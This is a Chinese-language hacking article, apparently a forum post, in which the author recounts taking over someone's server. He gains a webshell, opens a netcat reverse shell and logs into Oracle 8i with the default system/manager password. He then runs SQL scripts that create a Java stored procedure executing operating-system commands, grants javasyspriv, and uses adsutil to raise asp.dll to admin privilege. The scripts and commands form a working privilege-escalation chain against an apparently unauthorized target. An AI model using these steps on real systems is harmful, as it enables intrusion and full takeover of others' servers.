利用ORACLE的system帐户默认口令提升权限
摘要: 近日,偶到一主机上逛了一圈 主机的配置 还算是安全 偏偏一个比较隐藏的目录下 残留一upfile.asp,结果轻轻松松的得到一webshell接着在主机上逛了逛,拿出superscan从外面扫了下 只开放了80端口 从user\程序目录里 发现 ...
近日,偶到一主机上逛了一圈 主机的配置 还算是安全 偏偏一个比较隐藏的目录下 残留一upfile.asp,结果轻轻松松的得到一webshell接着在主机上逛了逛,拿出superscan从外面扫了下 只开放了80端口 从user\程序目录里 发现有一快捷方式firecontrol 好象是某款硬件防火墙的控制台?EBSHELL下检测了下 开放的服务 发现一般的可提权的方法 都不可行 无SERV-U等等 主机的补丁也是打到了最新. 试了下,传了个NC上去 反连接得到一SHELL 这下比在老兵的管理器里舒服多了在C盘下看到一目录 oracle 看了下C:\oracle\ora81\network\ADMIN\tnsnames.ora文件 确定了主机的服务名xxx 看了下版本 oracle 8i 用数据库连接器 Provider=MSDAORA.1;Password=manager;User ID=system;Data Source=xxxx 试了下默认的system帐户 密码manager结果真的就连接到了本地的oracle服务这下好了 oracle的system帐户 就像是mssql下的sa 我们来通过他来提升权限 马上编辑了几个脚本 1.sql create or replace and compile java source named "Util" as import java.io.*; import java.lang.*; public class Util extends Object { public static int RunThis(String args) { Runtime rt = Runtime.getRuntime(); int rc = -1; try { Process p = rt.exec(args); int bufSize = 4096; BufferedInputStream bis = new BufferedInputStream(p.getInputStream(), bufSize); int len; byte buffer[] = new byte[bufSize]; // Echo back what the program spit out while ((len = bis.read(buffer, 0, bufSize)) != -1) System.out.write(buffer, 0, len); rc = p.waitFor(); } catch (Exception e) { e.printStackTrace(); rc = -1; } finally { return rc; } } } --------------------------------------- 2.sql create or replace function RUN_CMD(p_cmd in varchar2) return number as language java name 'Util.RunThis(java.lang.String) return integer'; ------------------------------------- 3.sql create or replace procedure RC(p_cmd in varchar2) as x number; begin x := run_cmd(p_cmd); end; --------------------------------- 保存在c:\下 然后用反连接得到的shell运行 sqlplus system/manager@xxx 然后在 再来执行脚本 SQL>@C:\1.sql SQL>@C:\2.sql SQL>@C:\3.sql 看到JAVA 已创建 函数已创建 过程已创建 接着我们继续 SQL> variable x number; SQL> set serveroutput on SQL> exec dbms_java.set_output(100000); SQL>grant javasyspriv to system 看到授权成功 接着我们就可以来执行系统命令了 我想 先把ASP.dll加入特权一组 SQL>exec :x := RUN_CMD('cscript adsutil.vbs set /W3SVC/InProcessIsapiApps "c:\winnt\system32\inetsrv\asp.dll" '); 看到过程已经成功完成 这个时候我们重新登陆我们的webshell 他已经具有admin权限了 接着 再用NC返回一个shell 已经是管理权限的了 我们可以做我们想干的事了 因为这个主机有防火墙 过滤了除80以外的端口 所以不好做图形的后门 只有留下一有权限的webshell到此 已经提权成功咯. |
下一篇:Zbot老木马换新装 轻松绕过邮箱安全检测
上一篇:小红伞(Avira)曝严重漏洞 黑客可劫持用户账户
欠扁 |
支持 |
超赞 |
难过 |
搞笑 |
扯淡 |
不解 |
头晕 |
特别推荐
- 2024-11-20保险小知识 有社保再买医疗险,就是浪费钱?
- 2024-10-24京东采销唱RAP、走秀再出圈 发布六大消费关
- 2024-10-24重回汉唐旗舰店创始人绿珠分享她眼中的京东
- 2024-10-24京东免费开放AI工具 助力合作伙伴健康增长
- 2024-10-24京东持续加码低价举措 3年招募至少1万名京
- 2024-10-24京东11.11现货开卖,将又便宜又好进行到底
- 2024-01-16号称全球最安全iPhone手机系统再遭攻击,国
- 2024-01-16第七代伊兰特有奖知识答题的题目及答案
- 2024-01-16如何继续推进实践基础上的理论创新?
- 2024-01-16十年来,我们经历了哪三件大事?
今天点击最高的新闻
一周点击最多的新闻
- 11-20保险小知识 有社保再买医疗险,就
- 10-24京东采销唱RAP、走秀再出圈 发布六
- 10-24重回汉唐旗舰店创始人绿珠分享她眼
- 10-24京东免费开放AI工具 助力合作伙伴
- 10-24京东持续加码低价举措 3年招募至少
- 10-24京东11.11现货开卖,将又便宜又好
- 01-16号称全球最安全iPhone手机系统再遭
- 01-16第七代伊兰特有奖知识答题的题目及
- 01-16如何继续推进实践基础上的理论创新
- 01-16十年来,我们经历了哪三件大事?
淘客联盟为网络淘客、赚客、黑客、红客提供全面的业界资讯,还提供最丰富的网站社区、相关教程与技巧供新手们学习,
多年来我们一直致力于为淘客、赚客、黑客与红客提供丰富的技术内容与资源。程序支持Disucz!X X3.5版本
Copyright © 2008-2014 WWW.TAOKE-CN.CN online services. All rights reserved.
Template designed by rein.In ReinNT.Inc ( 湘ICP备14013968号-3 )
多年来我们一直致力于为淘客、赚客、黑客与红客提供丰富的技术内容与资源。程序支持Disucz!X X3.5版本
Copyright © 2008-2014 WWW.TAOKE-CN.CN online services. All rights reserved.
Template designed by rein.In ReinNT.Inc ( 湘ICP备14013968号-3 )